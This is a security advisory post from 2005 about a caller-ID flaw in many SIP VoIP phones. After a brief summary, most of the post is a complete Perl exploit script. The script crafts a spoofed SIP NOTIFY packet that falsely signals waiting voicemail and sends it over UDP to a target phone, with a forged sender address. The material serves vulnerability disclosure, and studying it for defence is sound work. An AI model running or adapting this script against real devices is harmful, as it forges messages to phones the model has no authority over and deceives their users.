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[EXPL] Notify Message Spoofing Vulnerability With VoIP Phones (Exploit)

Subject: [EXPL] Notify Message Spoofing Vulnerability With VoIP Phones (Exploit)
Date: 11 Jul 2005 14:31:21 +0200
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  Notify Message Spoofing Vulnerability With VoIP Phones (Exploit)
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SUMMARY

As reported earlier, many SIP implementations do not perform proper 
Caller-ID checks. This allows an attacker to spoof various NOTIFY 
messages, such as call-waiting and voice-mail.
For more information see:  
<http://www.securiteam.com/securitynews/5MP0C00GAM.html> Notify Message 
Spoofing Vulnerability With VoIP Phones

DETAILS

#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-07-08 17:49
# All Rights Reserved - Copyright (tm)

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;
my $repeated_type = "A";

if (!$target)
{
 usage();

 print "No target has been supplied, reverting to 192.168.3.10.\n";
 $target = "192.168.3.10";
}

my $attackerip = shift;
if (!$attackerip)
{
 usage();

 print "Attacker IP address has not been supplied, reverting to 
192.168.3.52.\n";
 $attackerip = "192.168.3.52";
}

my $attackedip = shift;
if (!$attackedip)
{
 usage();

 print "Contact IP address has not been supplied, reverting to 
192.168.3.9.\n";
 $attackedip = "192.168.3.9";
}

print "Will attack $target.\n";
print "Attacker IP address defined as: $attackerip\n";
print "Attacked IP address defined as: $attackedip\n";

my $target_port = 5060;

my $packet =<<END;
NOTIFY sip:username:password\@$attackerip SIP/2.0\r
To: <sip:$attackedip:$target_port>\r
Via: SIP/2.0/UDP $attackedip:5060;branch=000000000000000\r
From: "asterisk" <sip:asterisk\@$attackedip>;tag=000000000\r
Contact: <sip:asterisk\@$attackerip>\r
Call-ID: 3121$attackedip\r
CSeq: 102 NOTIFY\r
User-Agent: Asterisk PBX\r
Event: message-summary\r
Content-Type: application/simple-message-summary\r
Max-Forwards: 70\r
Content-Length: 37\r
\r
Messages-Waiting: yes\r
Voicemail: 3/2\r
END

print "Sending: [$packet]\n";
print "Length: ".length($packet)."\n";

socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));

my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);

send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to 
$target : $target_port : $!\n";

print "Done.\n";

sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print ("#"x50);
 print "\n";
 print "# $0 [hostname] [repeater] [attackerip] [attackedip]\n";
 print "# hostname\t-\tThe host the packet will be sent to.\n";
 print "# repeater\t-\tThe number of times the character will be sent 
(repeated character $repeated_type).\n";
 print "# attackerip\t-\tThe IP address from which the packet should 
be\n";
 print "\t\t\taddressed from (doesn't have to be your IP address).\n";
 print "# attackedip\t-\tThe IP address that you are contacting\n";
 print "\t\t\t(doesn't have to be the hostname IP's address).\n";
 print "\n";
 print "Results may vary depending on how the remote host handles 
packets.\n";
 print "For example:\n";
 print " * Some SIP Proxies won't look into packets addressed to it 
(attackedip or attackerip).\n";
 print " * Some SIP Routers won't handle packets that aren't addressed to 
it.\n";
 print "etc\n";
 print "\n";
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:storm@beyondsecurity.com> 
beSTORM.



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